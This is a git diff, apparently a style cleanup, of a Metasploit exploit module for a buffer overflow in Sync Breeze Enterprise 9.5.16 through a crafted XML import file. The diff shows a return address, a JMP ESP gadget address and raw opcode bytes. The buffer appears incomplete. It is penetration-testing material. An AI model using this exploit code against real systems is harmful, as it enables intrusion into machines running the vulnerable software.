diff --git a/modules/exploits/windows/fileformat/syncbreeze_xml.rb b/modules/exploits/windows/fileformat/syncbreeze_xml.rb index 1063523f53..22debc3c24 100644 --- a/modules/exploits/windows/fileformat/syncbreeze_xml.rb +++ b/modules/exploits/windows/fileformat/syncbreeze_xml.rb @@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow', - 'Description' => %q{ + 'Description' => %q( This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ - 'Daniel Teixeira', + 'Daniel Teixeira' ], 'References' => [ @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ - ['Windows Universal', {'Ret' => 0x10015FFE } ], + ['Windows Universal', { 'Ret' => 0x10015FFE } ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 29 2017', @@ -49,28 +49,26 @@ class MetasploitModule < Msf::Exploit::Remote [ OptString.new('FILENAME', [true, 'The file name.', 'msf.xml']) ]) - end def exploit - jmpesp= "\x7A\xB7\x1B\x65" #JMP ESP QtGui4.dll - esp = "\x8D\x44\x24\x4C" #LEA EAX, [ESP+76] - jmp = "\xFF\xE0" #JMP ESP + jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll + esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] + jmp = "\xFF\xE0" # JMP ESP buffer = "\n" - print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end